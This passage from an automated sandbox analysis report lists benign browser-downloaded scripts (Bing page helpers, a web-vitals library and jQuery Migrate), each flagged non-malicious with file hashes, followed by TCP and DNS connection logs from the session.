                                                                            Preview:var SWRM;(function(n){function r(n,t){if(navigator&&navigator.serviceWorker&&navigator.serviceWorker.register&&!f()){var r="SWRM",i=n.toString();return navigator.serviceWorker.register("/BingDSWM.js?bsw="+i,{updateViaCache:"all",scope:t}).then(function(n){return e(),Log.Log(r,"RegistrationSucceeded",i,!1),sj_cook.set("SerpPWA","RegSWM",i,!0,"/"),n})["catch"](function(n){Log.Log(r,"RegistrationFailed",i+"; Error message: "+n);throw n;})}return Promise.reject("Navigator interface is not supported.")}function u(){if(navigator&&navigator.serviceWorker&&navigator.serviceWorker.getRegistrations&&!t){var n="SWRM";navigator.serviceWorker.getRegistrations().then(function(t){for(var u,i=0,r=t;i<r.length;i++)u=r[i],u.unregister().then(function(){sj_cook.clear("SerpPWA","/");Log.Log(n,"UnregisterSucceeded","")})["catch"](function(t){Log.Log(n,"UnregisterFailed","Error message: "+t)})})}}function f(){var r=i(),n;if(!r)return t;try{return n=sessionStorage.getItem("RegSWM"),n!=null}catch(u){return t}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (622), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):622
                                                                            Entropy (8bit):5.265947581512117
                                                                            Encrypted:false
                                                                            SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                            MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                            SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                            SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                            SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (385), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):385
                                                                            Entropy (8bit):4.936376566808913
                                                                            Encrypted:false
                                                                            SSDEEP:12:plfn6AV2wCBW0eLeFZfg9DW3si0lov0Ur:pl6WV0e+ZfgU3ClosUr
                                                                            MD5:A1FA00AE2F6AEF9F21F45585BA052882
                                                                            SHA1:3A9C42D5B48FB6A045B9A78A20B571BE25FB78FB
                                                                            SHA-256:621B48AD818F5CB1DE51B58BEC5193E0243EFFB8E805D45BA960F688A49C7748
                                                                            SHA-512:99924D889724941E71A0456097DC59B4C73BD6311C81AF28854FA3513F42EF819CD3C0303B0E982EE40E5B82CF1D24F7835C637DE536F2A92F0F34E0AEFA3672
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/OpxC1bSPtqBFuaeKILVxviX7ePs.js
                                                                            Preview:_w.keyMap={Content:"b_content",SearchForm:"sb_form",SBoxId:"sb_form_q",Notification:"b_notificationContainer",Identity:"id_h",Prefix:"b_",RmsDefer:"aRmsDefer",RmsKeys:["rms:answers:Shared:BingCore.Bundle","rms:answers:AjaxSerp:Ajax.Bundle","rms:answers:BoxModel:Framework"],AutoSug:"sa_as",FeaturePersist:1,LangSwitch:"langChange",ASContainer:"sw_as",Result:"b_results",HBop:"sb_hbop"}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (7179)
                                                                            Category:downloaded
                                                                            Size (bytes):7180
                                                                            Entropy (8bit):5.161749091368312
                                                                            Encrypted:false
                                                                            SSDEEP:192:HA1SI+LtL5XIr10Tjyf8J+Bz9NgR51fuPKZs7f/:g1SIiXhqabao6/
                                                                            MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                            SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                            SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                            SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/hOpjVE2mSiNVJWsLrpc64ergTOY.js
                                                                            Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):12065
                                                                            Entropy (8bit):4.318537753561513
                                                                            Encrypted:false
                                                                            SSDEEP:192:ViWdTdprmkw2JhAxxrYYna9Q8uhCXfXwKaxv:ViWdTdtmkPg/MuadX/Av
                                                                            MD5:04105B94CFA9CDDCB38F59EC8AFC555A
                                                                            SHA1:B1DCFFDD8762706A67D8D2D91E4694C2F72EC083
                                                                            SHA-256:8C2669CD92DA7FBB351BE4287C3EA7B99599948A07431B80EC630570B87CF174
                                                                            SHA-512:A0A70031A4C084C2F058B7798C7E620E121CAC265A76F77CF14392B86F7BD702D1F95E73B61A883445D6A0B1604CECEB6FF60FDAB4B793A83DEA1418239B43F6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:/*! jQuery Migrate v3.0.0 | (c) jQuery Foundation and other contributors | jquery.org/license */.."undefined" == typeof jQuery.migrateMute && (jQuery.migrateMute = !0),.. (function (a, b) {.. "use strict";.. function c(c) {.. var d = b.console;.. e[c] ||.. ((e[c] = !0),.. a.migrateWarnings.push(c),.. d &&.. d.warn &&.. !a.migrateMute &&.. (d.warn("JQMIGRATE: " + c), a.migrateTrace && d.trace && d.trace()));.. }.. function d(a, b, d, e) {.. Object.defineProperty(a, b, {.. configurable: !0,.. enumerable: !0,.. get: function () {.. return c(e), d;.. },.. });.. }.. (a.migrateVersion = "3.0.0"),.. (function () {.. var c =.. b.console &&.. b.console.log &&.. function () {.. b.console.log.apply(b.console, arguments);.. },.. d = /^[12]\./;.. c &&.. ((a && !d.test(a.fn.jquery)) ||
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (678), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):678
                                                                            Entropy (8bit):5.27994341520551
                                                                            Encrypted:false
                                                                            SSDEEP:12:eGBLK5Lud/zc+TbaVodQpdh93L/3QC+O1DepypTNQiZFrxbyRHHG:eGBoc/zcQ7odh93r/9D5pTNQ+FCHHG
                                                                            MD5:4D471610348B120B0DD752C4A8F5BF4C
                                                                            SHA1:F5DB5A2224D203615391D4B5D2ABE50C50692138
                                                                            SHA-256:C50D523A4995DA445CC646E358D53E2F881811A4043F7E287740C5FF2464C78B
                                                                            SHA-512:5F7AA4BF6AB8A86F0DDDBF3D8CB84EE841ED9F725846286545233614E01C4D2B8B8609BD984779699A19D0641CD9AE995C4773B83FAA49CE69B03FF611E8DB01
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var PaginationWithBFPRResults;(function(){function r(){var t,i,n,r;if(typeof webResultsUrls!="undefined"&&(t=document.querySelector("#b_results li.b_pag"),t))for(i=t.querySelectorAll("a.sb_bp"),n=0;n<i.length;n++)r=i[n],Lib.CssClass.contains(r,"sb_pag_first")||sj_be(r,"mousedown",u)}function u(){var r=f();sj_cook&&sj_cook.set(n,t,r,!1,"/");sj_cook&&sj_cook.set(n,i,_G.IG,!1,"/")}function f(){if(webResultsUrls.length===0)return"";var n;try{n=webResultsUrls.join(",");n=n===null||n===void 0?void 0:n.replace(/,/g,"%2C")}catch(t){throw new Error(t.message);}return n}var n="BFPRResults",t="FirstPageUrls",i="FPIG";r()})(PaginationWithBFPRResults||(PaginationWithBFPRResults={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (912), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):912
                                                                            Entropy (8bit):5.121926145543368
                                                                            Encrypted:false
                                                                            SSDEEP:12:5GKI+kvKDiq2W8Q6wWkAvADWcEjMZgOj1Ly/Exq3ADWcEffbcj1Ly/JoC0f9xglB:5qnvk2ABAsFlSE9leEFLBc
                                                                            MD5:6E7EC123684ACED736E80EEAB4B5C7A2
                                                                            SHA1:FDF75B57EB954B5648D48BAE1D93DEC8B0B319B2
                                                                            SHA-256:1D40A030B13F26D2698D1807ADD59CF75332D5D2A7045FE3EB26891823B28A48
                                                                            SHA-512:E401996DBB61056A6F1B8F6A65B389D72197A5A3466E4CE14C25AF5DE2A9848633EE81661F84E9EC98D263665C057EA2A48FD103580BF7CB233F1A0B3425840E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var TextSpacing;(function(n){function f(n){if(typeof sj_ce!="undefined"&&u&&t&&r&&(window.MutationObserver||window.WebKitMutationObserver)&&typeof MutationObserver=="function"){var i=new MutationObserver(function(){var i=_qs("header nav ul li a");if(i&&window.getComputedStyle(i).getPropertyValue("letter-spacing")!="normal"&&!t.classList.contains("b_tsp"))t.classList.add("b_tsp"),e(n),typeof Log!="undefined"&&Log.Log("Info","Accessibility","TextSpacing");else if(i&&window.getComputedStyle(i).getPropertyValue("letter-spacing")=="normal"&&t.classList.contains("b_tsp"))t.classList.remove("b_tsp"),typeof Log!="undefined"&&Log.Log("Info","Accessibility","NoTextSpacing");else return});i.observe(r,{subtree:!0,childList:!0})}}function e(n){var t=sj_ce("link");i||(t.rel="stylesheet",t.href=n,u.appendChild(t),i=!0)}var i=!1,r=_qs("html"),u=document.head,t=document.body;n.init=f})(TextSpacing||(TextSpacing={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3363
                                                                            Entropy (8bit):5.195022922251816
                                                                            Encrypted:false
                                                                            SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                            MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                            SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                            SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                            SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/zeCxMEtVi23nUD1VnJIBRkRzb4g.js
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):12065
                                                                            Entropy (8bit):4.318537753561513
                                                                            Encrypted:false
                                                                            SSDEEP:192:ViWdTdprmkw2JhAxxrYYna9Q8uhCXfXwKaxv:ViWdTdtmkPg/MuadX/Av
                                                                            MD5:04105B94CFA9CDDCB38F59EC8AFC555A
                                                                            SHA1:B1DCFFDD8762706A67D8D2D91E4694C2F72EC083
                                                                            SHA-256:8C2669CD92DA7FBB351BE4287C3EA7B99599948A07431B80EC630570B87CF174
                                                                            SHA-512:A0A70031A4C084C2F058B7798C7E620E121CAC265A76F77CF14392B86F7BD702D1F95E73B61A883445D6A0B1604CECEB6FF60FDAB4B793A83DEA1418239B43F6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/lib/jquery/jquery-migrate-3.0.0.min.js
                                                                            Preview:/*! jQuery Migrate v3.0.0 | (c) jQuery Foundation and other contributors | jquery.org/license */.."undefined" == typeof jQuery.migrateMute && (jQuery.migrateMute = !0),.. (function (a, b) {.. "use strict";.. function c(c) {.. var d = b.console;.. e[c] ||.. ((e[c] = !0),.. a.migrateWarnings.push(c),.. d &&.. d.warn &&.. !a.migrateMute &&.. (d.warn("JQMIGRATE: " + c), a.migrateTrace && d.trace && d.trace()));.. }.. function d(a, b, d, e) {.. Object.defineProperty(a, b, {.. configurable: !0,.. enumerable: !0,.. get: function () {.. return c(e), d;.. },.. });.. }.. (a.migrateVersion = "3.0.0"),.. (function () {.. var c =.. b.console &&.. b.console.log &&.. function () {.. b.console.log.apply(b.console, arguments);.. },.. d = /^[12]\./;.. c &&.. ((a && !d.test(a.fn.jquery)) ||
                                                                            No static file info
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 23, 2024 18:48:03.846544027 CET49675443192.168.2.4173.222.162.32
                                                                            Dec 23, 2024 18:48:07.497308016 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:07.497359991 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:07.497457981 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:07.497690916 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:07.497713089 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:09.194432020 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:09.199181080 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:09.199208975 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:09.200088978 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:09.200158119 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:09.201531887 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:09.201595068 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:09.257352114 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:09.257376909 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:09.304644108 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:09.412893057 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:09.412925005 CET44349740104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:09.412993908 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:09.413352966 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:09.413367987 CET44349740104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:09.413763046 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:09.413803101 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:09.413873911 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:09.414151907 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:09.414166927 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.654165983 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.654906034 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.654918909 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.655776024 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.655846119 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660198927 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660255909 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.660263062 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660347939 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660396099 CET44349741104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.660413980 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660439014 CET49741443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660701990 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.660729885 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.661063910 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.661158085 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.661164999 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.664047003 CET44349740104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.664258957 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.664283991 CET44349740104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.665927887 CET44349740104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.666053057 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.666923046 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.666923046 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.666970968 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.667010069 CET44349740104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.667118073 CET49740443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.667223930 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.667254925 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:10.667340040 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.667512894 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:10.667526007 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.886485100 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.886733055 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.886749029 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.887767076 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.887815952 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.891494989 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.891568899 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.891980886 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.891993046 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.900413990 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.901412964 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.901441097 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.902945042 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.903016090 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.903384924 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.903456926 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:11.940144062 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.956190109 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:11.956248999 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:12.002664089 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:12.544632912 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:12.544680119 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:12.544749975 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:12.544764042 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:12.544775009 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:12.544816971 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:12.548494101 CET49743443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:12.548507929 CET44349743104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:12.684443951 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:12.684479952 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:12.684560061 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:12.684776068 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:12.684789896 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:13.901027918 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:13.901314974 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:13.901325941 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:13.902765036 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:13.902868986 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:13.903944016 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:13.904022932 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:13.904149055 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:13.904159069 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:13.953831911 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.355853081 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:14.355953932 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:14.356017113 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.356101990 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.356116056 CET4434974535.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:14.356131077 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.356185913 CET49745443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.356950998 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.357054949 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:14.357136965 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.357325077 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:14.357361078 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:15.588258982 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:15.588606119 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:15.588640928 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:15.589148998 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:15.589699984 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:15.589790106 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:15.589947939 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:15.631340027 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:16.065383911 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:16.065449953 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:16.065526962 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:16.065834999 CET49748443192.168.2.435.190.80.1
                                                                            Dec 23, 2024 18:48:16.065874100 CET4434974835.190.80.1192.168.2.4
                                                                            Dec 23, 2024 18:48:18.885443926 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:18.885529041 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:18.885586977 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:19.075628996 CET49738443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:48:19.075642109 CET44349738172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:48:20.445204973 CET4972380192.168.2.4199.232.214.172
                                                                            Dec 23, 2024 18:48:20.565074921 CET8049723199.232.214.172192.168.2.4
                                                                            Dec 23, 2024 18:48:20.565129042 CET4972380192.168.2.4199.232.214.172
                                                                            Dec 23, 2024 18:48:26.696868896 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:26.697009087 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:48:26.697067022 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:28.250502110 CET49744443192.168.2.4104.21.50.192
                                                                            Dec 23, 2024 18:48:28.250555038 CET44349744104.21.50.192192.168.2.4
                                                                            Dec 23, 2024 18:49:06.670587063 CET4972480192.168.2.4199.232.214.172
                                                                            Dec 23, 2024 18:49:06.790649891 CET8049724199.232.214.172192.168.2.4
                                                                            Dec 23, 2024 18:49:06.790700912 CET4972480192.168.2.4199.232.214.172
                                                                            Dec 23, 2024 18:49:07.411691904 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:07.411720991 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:07.411839962 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:07.412009954 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:07.412023067 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:09.120157957 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:09.120445013 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:09.120461941 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:09.121535063 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:09.122472048 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:09.122634888 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:09.167890072 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:18.806730986 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:18.806874990 CET44350006172.217.21.36192.168.2.4
                                                                            Dec 23, 2024 18:49:18.806931973 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:18.920882940 CET50006443192.168.2.4172.217.21.36
                                                                            Dec 23, 2024 18:49:18.920907021 CET44350006172.217.21.36192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 23, 2024 18:48:03.626233101 CET53601271.1.1.1192.168.2.4
